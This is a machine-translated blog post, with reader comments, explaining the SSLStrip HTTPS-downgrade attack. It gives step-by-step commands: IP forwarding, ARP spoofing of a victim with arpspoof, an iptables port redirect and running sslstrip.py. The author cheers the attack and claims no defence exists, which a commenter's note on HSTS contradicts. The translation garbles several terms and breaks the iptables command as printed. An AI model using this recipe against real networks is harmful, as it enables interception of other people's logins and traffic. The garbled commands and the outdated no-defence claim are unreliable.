SSLStrip: špijuniranje SSL prometa

Moxie Marlinspike predstavljena na Crni šešir 2009 izvrstan alat koji se zove SSLStrip, usmjereno na natjerajte korisnika da vjeruje da je na web lokaciji sa SSL šifriranjem, dok se zapravo svi podaci prenose na otvorenom. Uz to, SSLStrip također prevari web server, čija se navodna enkripcija zaobilazi iako se web lokacija i dalje ponaša kao da radi.

Koliko sam mogao shvatiti, ova metoda i dalje izvrsno funkcionira. Prijetnja još uvijek postoji i svi smo izloženi. Buahaha ...

Počnimo s osnovama: koji je vrag SSL?

Za one koji ne znaju, Secure Sockets Layer (SSL; protokol sigurnosnog sloja utičnice) i njegov nasljednik Transport Layer Security (TLS; sigurnost transportnog sloja) su kriptografski protokoli koji pružaju sigurnu komunikaciju putem mreže, obično Internet.

SSL se izvodi na sloju između aplikacijskih protokola kao što su HTTP, SMTP, NNTP i preko protokola TCP transporta, koji je dio TCP / IP porodice protokola. Iako može pružiti sigurnost za bilo koji protokol koji koristi pouzdane veze (kao što je TCP), u većini slučajeva koristi se zajedno s HTTP-om za formiranje HTTPS-a. HTTPS koristi se za zaštitu web stranica na Internetu za web aplikacije. elektronska trgovina, pomoću certifikata javnih ključeva za provjeru identiteta krajnjih točaka.

SSLStrip ... da li se pornografija vratila na Let's Use Linux?

Operacija SSLStrip jednostavno je, zamijeniti sve HTTPS zahtjeve web stranice putem HTTP-a, a zatim vrši MITM (napad «Čovek na sredini«) Između servera i klijenta. Ideja je da žrtva i napadač komuniciraju putem HTTP-a, dok napadač i server komuniciraju putem HTTPS-a sa sertifikatom servera. Dakle, napadač je u stanju vidjeti sav promet otvorenog teksta žrtve.

Evo videozapisa na kojem možemo vidjeti kako funkcionira ovaj izvrsni alat.

Kako se koristi SSLStrip

1.- Konfigurirajte prosljeđivanje IP-a

echo 1> / proc / sys / net / ipv4 / ip_forward

2.- Izvođenje ARP MITM napada između 2 mašine:

arpspoof -i eth0 -t VODITELJ VICTIMA

3.- Preusmjeri promet sa iptables:

iptables -t nat -A PREROUTING -p tcp –odredišni port 80 -j REDIRECT –to-ports 8080

4.- Pokrenite SSLStrip na korištenom portu

python sslstrip.py -w datoteka

Kako se zaštititi od SSLStrip napada?

Ovo je najljepše i najstrašnije: ne može.

Kao što je pokazao Moxie (njegov video ne gubi se nešto više od 69 minuta) jedino vjerovatno rješenje za sve ovo je šifriranje svih HTTP veza, odnosno da uobičajeni i divlji "HTTP" u svim svojim slučajevima bude zamijenjen "HTTPS", bez obzira na stranicu ili uslugu . Kao što je Moxie rekla, 'problem predstavlja sigurni protokol koji ovisi o nesigurnom protokolu".

Šta barem možete učiniti kao korisnik smanjiti šanse za napad? Provjerite na paranoičan način da se ispred svake stranice koja je ugrožena nalazi "https" ili u slučaju instalacije korisnika Firefoxa NoScript i prisiliti HTTPS veze na svim stranicama. Pa ipak, ovo bi samo minimiziralo učinak, a ne i negiralo ga.

Izvor: zmajeva tegla & Moxie

Hvala Franciscu što si nam proslijedio informacije!

Ostavite komentar

Vaša e-mail adresa neće biti objavljena. Obavezna polja su označena sa *

*

*

  1. Za podatke odgovoran: Miguel Ángel Gatón
  2. Svrha podataka: Kontrola neželjene pošte, upravljanje komentarima.
  3. Legitimacija: Vaš pristanak
  4. Komunikacija podataka: Podaci se neće dostavljati trećim stranama, osim po zakonskoj obavezi.
  5. Pohrana podataka: Baza podataka koju hostuje Occentus Networks (EU)
  6. Prava: U bilo kojem trenutku možete ograničiti, oporaviti i izbrisati svoje podatke.

  1.   Guido Ignatius Ignatius rekao je

    Mmmm ... što se tiče https-a koji vas štiti od prečice, relativan je.

    Ne znam u kojoj mjeri mitm napadi nisu uspješni protiv SSL veza, mitm napadi rade na sloju veze dok ssl na transportnom sloju, tako da je moguće hvatanje podataka.

    Davno sam radio testove za rad na tečaju koji sam radio sa mitm-om u svojoj lokalnoj mreži i moguće je uzeti podatke poslane SSL-om, isprobati hotmail (što je ssl) i to bez problema vraća prolaz. Samo pomislite da se napadač lažno predstavlja kao da je pristupnik i prima sve informacije od žrtve.

    Jedini način da saznate da vaše informacije sigurno putuju je upotreba ssh tunela.

    Ono što radim ako se osjećam pomalo progonjenim je da se povežem sa svojim serverom pomoću ssh-a, prođem kroz lokalni port, otvorim utičnice i koristim svoju internetsku vezu kod kuće za navigaciju dok sam na tuđem računaru.

    I kao što su rekli, ne postoji način da se izbjegne ovaj napad, osim da se osigura naš dhcp pomoću mac-a i osigura ko se poveže ...

  2.   pablord rekao je

    zdravo, u naredbi 4 nedostajao vam je "-l 8080"

  3.   Koristimo Linux rekao je

    U redu. hvala!

  4.   martin farias rekao je

    Da budemo precizniji, tačka u kojoj se više ne možete zaštititi jednom je uhvaćena u MitM napadu. Postoje različiti načini da se zaštitite od ovog napada, iako je to teško jer ima varijante.

    EDIT:

    Ažuriranje komentara vrijedi! Otkrio sam da barem od januara 2012. preglednici chrome i firefox (ne bih se iznenadio da su svi u ovom trenutku) koriste HSTS zaglavlja. Pritom, ovo zaglavlje rješava ranjivost obavještavanjem preglednika da "veze" moraju uvijek koristiti SSL nakon prvog pokušaja povezivanja s web lokacijom (ovo ranjivost održava minimalno prisutnom). Nadalje, Chrome povećava sigurnost dodavanjem liste HSTS web lokacija (vjerojatno najpopularnijih na webu). izvor: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/

  5.   HacKan & CuBa co. rekao je

    Vrlo dobro, mislim da je super cool. Ideja je zaista jednostavna 😀

  6.   Koristimo Linux rekao je

    Kao i…

  7.   ChambertuX rekao je

    Zna li netko može li se arpspoof koristiti kada imamo više od jednog domaćina na mreži? Hvala ti.